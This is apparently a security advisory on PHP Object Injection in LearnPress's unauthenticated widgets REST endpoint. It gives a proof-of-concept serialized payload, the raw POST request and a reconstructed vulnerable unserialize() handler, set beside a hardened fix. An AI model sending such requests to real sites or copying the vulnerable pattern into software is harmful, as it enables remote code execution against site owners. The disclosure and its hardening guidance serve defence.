The plugin unserialises user input in a REST API endpoint available to unauthenticated users, which could lead to PHP Object Injection when a suitable gadget chain is present, leading to remote code execution (RCE). To successfully exploit this vulnerability, attackers must have knowledge of the site secrets, which allows them to generate a valid hash via the wp_hash() function.
To simulate a gadget chain, put the following code in a plugin:

    class Evil {
        public function __wakeup() : void {
            die("Arbitrary deserialization");
        }
    }

Payload:

    {"widget":"learnpress_widget_course_extra","instance":"Tzo0OiJFdmlsIjowOnt9Ow==","hash":"ef7da9dd4fe6ebf4598ab3c7b975322f"}

- instance is the base64 encoding of the serialized object: O:4:"Evil":0:{};
- hash is calculated by: wp_hash(base64_decode($instance))

Request:

    POST /wp-json/lp/v1/widgets/api?_locale=user HTTP/1.1
    Content-Type: application/json
    Content-Length: 123

    {"widget":"learnpress_widget_course_extra","instance":"Tzo0OiJFdmlsIjowOnt9Ow==","hash":"ef7da9dd4fe6ebf4598ab3c7b975322f"}
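The following is an added example and not LearnPress's own code. It reconstructs the handler pattern the advisory describes (a wp_hash() digest gating unserialize() of the decoded instance) beside a hardened handler for the same route. The route lp/v1/widgets/api and the widget, instance and hash parameters are taken from the advisory; the function names and the allow-list of widget ids are assumptions for illustration.

```php
<?php
// Added example, not the plugin's own code. Route and parameter names come
// from the advisory; handler names and the widget allow-list are assumed.

// Pattern the advisory describes: a wp_hash() digest over the raw instance
// gates a call to unserialize(). Any class reachable in the loaded code base
// is instantiated, and its __wakeup()/__destruct() runs, before the handler
// can inspect the result, so security rests entirely on the site secrets.
function lp_widget_api_vulnerable( WP_REST_Request $request ) {
    $instance_raw = base64_decode( (string) $request->get_param( 'instance' ) );
    $hash         = (string) $request->get_param( 'hash' );

    if ( wp_hash( $instance_raw ) !== $hash ) {
        return new WP_Error( 'lp_bad_hash', 'Invalid hash', array( 'status' => 403 ) );
    }

    $instance = unserialize( $instance_raw ); // PHP Object Injection sink
    return rest_ensure_response( $instance );
}

// Hardened handler: attacker-controlled bytes never reach a class-instantiating
// unserialize(). The hash check is kept as defence in depth and compared in
// constant time, but the endpoint no longer depends on it alone.
function lp_widget_api_hardened( WP_REST_Request $request ) {
    // Assumed allow-list; a real plugin would derive it from its registered widgets.
    $allowed_widgets = array( 'learnpress_widget_course_extra' );

    $widget       = sanitize_key( (string) $request->get_param( 'widget' ) );
    $instance_raw = base64_decode( (string) $request->get_param( 'instance' ), true );
    $hash         = (string) $request->get_param( 'hash' );

    if ( ! in_array( $widget, $allowed_widgets, true ) ) {
        return new WP_Error( 'lp_bad_widget', 'Unknown widget', array( 'status' => 400 ) );
    }
    if ( false === $instance_raw || ! hash_equals( wp_hash( $instance_raw ), $hash ) ) {
        return new WP_Error( 'lp_bad_hash', 'Invalid hash', array( 'status' => 403 ) );
    }

    // Preferred transport: JSON, which can only yield scalars and arrays.
    $instance = json_decode( $instance_raw, true );

    if ( null === $instance ) {
        // Legacy serialized instances: parse with class instantiation disabled.
        // A payload such as O:4:"Evil":0:{} then becomes a __PHP_Incomplete_Class
        // whose __wakeup() is never invoked, and the is_array() check below
        // rejects it instead of storing it.
        $instance = unserialize( $instance_raw, array( 'allowed_classes' => false ) );
    }
    if ( ! is_array( $instance ) ) {
        return new WP_Error( 'lp_bad_instance', 'Instance must be an array', array( 'status' => 400 ) );
    }

    return rest_ensure_response( array( 'widget' => $widget, 'instance' => $instance ) );
}

add_action( 'rest_api_init', function () {
    register_rest_route( 'lp/v1', '/widgets/api', array(
        'methods'             => 'POST',
        'callback'            => 'lp_widget_api_hardened',
        // The advisory states the endpoint is reachable unauthenticated; the
        // hardening above holds without relying on a permission check.
        'permission_callback' => '__return_true',
    ) );
} );
```

Two design points: the hash is compared with hash_equals() rather than !== so the check is not a timing oracle, and the rejected __PHP_Incomplete_Class is never stored, so it cannot be re-serialised later into a code path that does allow classes. Moving widget instances to JSON removes the unserialize() sink altogether; the allowed_classes branch exists only to keep previously stored serialized instances readable.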
Nguyen Duy Quoc Khanh
2022-10-05 (about 3 months ago)